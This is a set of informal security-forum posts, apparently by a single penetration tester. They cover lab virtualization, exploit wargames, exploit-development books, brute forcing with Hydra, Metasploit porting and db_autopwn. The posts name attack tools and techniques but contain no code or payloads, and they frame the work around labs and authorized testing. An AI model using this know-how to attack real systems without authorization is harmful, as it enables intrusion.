You could always write some snort rules that log posts to the sites you are most interested in monitoring.  You would probably get way more than you wanted,  but that would certainly be a possibility.

Virtualbox is great with one exception, the networking.  If you are interested in having your own network and putting all of the virtual boxes on the network through NAT, then Virtualbox is cake to setup.  The one beef that I have is that it sucks to have to create individual bridge adapters and then more individual adapters for each box linked with the bridge device.  Then if you want DHCP on a host only network, you need to set that up yourself.  In comparison to VMware, virtualbox needs to fix that.  As far as speed, I think Virtualbox is much faster and seems to have a smaller memory footprint.  For my linux boxes, I use virtualbox as my VM architecture since the hardware support seems great.

As far as lab boxes,  I have 2 linux boxes, one a quad core 4g ram and one a dual core with 2g of ram that I use.  I use ESX server on them and have a host only network on each with a small linux box I use as a gateway server and allow or disallow bridging when I need it to bridge the host only network to the real word for software downloads etc.  I have a number of other boxes that I use in bridged mode to do testing with.  This setup is nice in that there are some boxes that I really REALLY don't want on the network, such as XP sp0 boxes, and others which require network access. 

I completely agree, these challenges are great and are always a fun thinking exercise. Whether you win the challenge or not, it's always fun to try to figure out how to solve these problems, and then to see how others solved it when the challenge is done. 

Starting mid-last year, I've been working on learning more about exploits, and in the process I found a neat site I wanted to tell folks about.  http://www.smashthestack.org has a number of different wargame servers.  The wargame servers host a progression of challenges where each challenge is dependent on the completion of the previous challenge. 

The challenges are *nix based, and range from very entry level to fairly complex.  The machines aren't truly a real world experience, as many of the features which protect servers from buffer and heap overflows in modern operating systems have been disabled, so if you are just learning about exploit creation then this is a great site.  In many of the challenges, the source code is provided, so in most challenges it should be fairly straightforward why the application is vulnerable.  Once you've figured out how to exploit the application and complete the challenge, there's the opportunity to add your name to "the wall", a web page for each level where folks can append their pseudonym or tag in order to let everyone else know they have completed the challenge.

In most cases, getting started is as simple as  sshing into one of the wargame servers.  From there, you should be presented with a message letting you know how to get started.  Many of the traditional tools needed to discover and create exploits are already present on the box, so you shouldn't need anything extra to get started.  All of the action happens on the servers. With the exception of potentially looking up shellcode through a tool like metasploit, a little bit of Google searching should be all that is required.

There is also a forum where questions can be asked, but unfortunately it isn't very active. There is an IRC channel for each server and a general social channel.  If you aren't familiar with IRC, there is a web based version linked off the front page of the site. 

If you need additional help with these challenges there are 2 books which served me well, and I used metasploit to generate the shellcode for the exploits.  The two books were "Hacking: The Art of Exploitation 2nd Edition", which I recently reviewed at http://www.ethicalhacker.net/content/view/224/2/,  and "The Shellcoder's Handbook".  I primarily used HTAoE, however for format string exploits, I used Shellcoder's Handbook as the explanation seemed to make more sense.

The challenges on this site should help solidify your understanding of some types of exploits as well as point out areas that require more work.  If you are interested in how exploits work and exploit development, then I recommend visiting the site and trying your hand at the challenges.  If nothing else, you should have a basic idea of where you stand, and you will probably have fun along the way.   

A discussion of looking beyond the vulnerabilities to the business processes which allowed them to be exposed may be a positive point as well.  While it's easy to point out all the stuff that's busted, coming up with a strategic plan that will keep an environment secure way longer than the next patch Tuesday would be great.  In many of the reports that I've seen, the strategic recommendations seem to be lacking.

Another one that I haven't seen much done with is evaluating network configuration.  For instance, layer 2 attacks are still effective without countermeasures in place, so a discussion of arp poisoning, and a discussion of why those protections are important might be nice.  MITM seems to be discussed a lot recently with tools like squirtle, cain and able, beef, and middler, etc.

Sounds like a neat class.  With your skills in social engineering, I hope that makes a showing as well    

This is a neat set of very straightforward exploitable pages.  I have 3 suggestions.  The first one is that your HTML is formatted very nicely in most places, if you formatted your code nicely too then it would be easier to read and to a certain extent understand what is going on with the application.

The second suggestion is since you included something on brutus, include something on .htpasswd files and using john or cain to crack them. Maybe make it something to do with a combination of a LFI. 

Another one might be to create a blind sql injection and suggest a tool like sqlbrute to map out table structure and eventually get the data. 

This is a really nice basic set of test applications to try out these types of vulnerabilities.  Thanks for putting all of these together

http://www.microsoft.com/technet/security/bulletin/ms08-dec.mspx

Microsoft has said that they will release the patch tomorrow.  I haven't seen it yet in my organization, but doing some testing I noticed that IE will crash with Symantec popping up an alert before I can get my stage 2 downloaded and installed.   I did take some of the sample URLs and look at the payloads that it was pushing down, it reminded me to take a look-see at my hosts file as both the payloads I saw included adding DNS entries. 

A pretty good tool for doing brute forcing is THC Hydra.  Your password list should probably be a combination of dictionary words, commonly used passwords (whether you can use ones from other engagements may or not be allowed based on your previous work arrangements), and another method to get good passwords is to mine for keywords off of the company's website.  Getting usernames can be done the same way, potentially looking through metadata to find usernames and ideas for passwords.  Check out metagoofil for metadata extraction.  There have been a few articles out there on this, most notably by Chris Gates and a post on pauldotcom.com by Larry. 

I would say it depends on the size and complexity of the exploit.  If it an extremely complex module, I'd backport shellcode from msf3, if it is a pretty simple one I'd port the exploit, or if you think you are going to use this exploit again in the future I'd port to msf3 since the options for things you can do seem to keep getting larger under the msf3 platform.

Also, in theory, you could hardcode your payload into the exploit with the perl output from msfpayload and then just use the handler capabilities of the module that you borrowed from msf3 with the closet things that mach in the msf2 framework. 

The previous version can be found here :
http://w.on24.com/r.htm?e=121680&s=1&k=A0A9EE250B2691348F1218E5F1B16CEA

If you haven't previously registered you may have to register. 

So.. I'm not a windows kernel hacker, but here is some speculation.  My guess would be that the ideal way to get to the things that you want is not assembly, but instead dll injection.  If you want to delete locked files, process explorer can probably help you.  If you want to scrape program memory, a debugger or such can be your best friend.  So I guess the real question is, what is your goal.  A file handle is basically just a view into the file that the operating system helps you keep track of so that you aren't doing a lot of other work that the operating system is already doing for you.  Files aren't always in one place on the disk, so the file handle makes sure you don't have to deal with that.  If you are trying to do something specific with these files, elaborate a little more and there may be some tools out there that will help you do what you'd like without writing any code.

A release announcement went out for Metasploit 3.2 today.  You can read the announcement here:
http://www.metasploit.com/documents/RELEASE-3.2.txt

Some of the new awesomeness includes:
Pass The Hash capabilities
Better Karmetasploit support
IPV6 support
PHP Payloads
and much more...

You can get the new hotness either via svn or by going to:
http://www.metasploit.com/framework/download/

and downloading the newest version.

I'm actually working on a review of it now.  This is a great book for getting the bases down for understanding how exploits work and how to write them.  This is sort of the primer for understanding many of the most common exploits out there today.  It is heavily unix centric, but in my opinion that makes it easier to understand.  I didn't find the examples horribly useful though, and I actually tested what I learned over at http://www.smashthestack.org/ and referenced back at this book at shellcoders handbook on a regular basis as I went through the excercises.

I'll be slightly more helpful, if you have NO idea what something is vulnerable to, you may want to try a vulnerability scanner like nessus.  There is another option for you to google which is db_autopwn.  If you search for that, and you use backtrack3 things will get easier for you.  If you use this approach for evil, you will get caught, it is EXTREMELY noisy and will have a low success rate.  If you do find a vulnerability, do a sessions -lv and it will show you what exploit you are vulnerable to.

You probably aren't vulnerable to that either, or something was wrong.  Since you may not be vulnerable to much, you may want to check out DVL linux (damn vulnerable linux) and start messing around on there.  That might get you further in the process.  Or install windows xp without service packs or patches and then metasploit becomes a lot more interesting.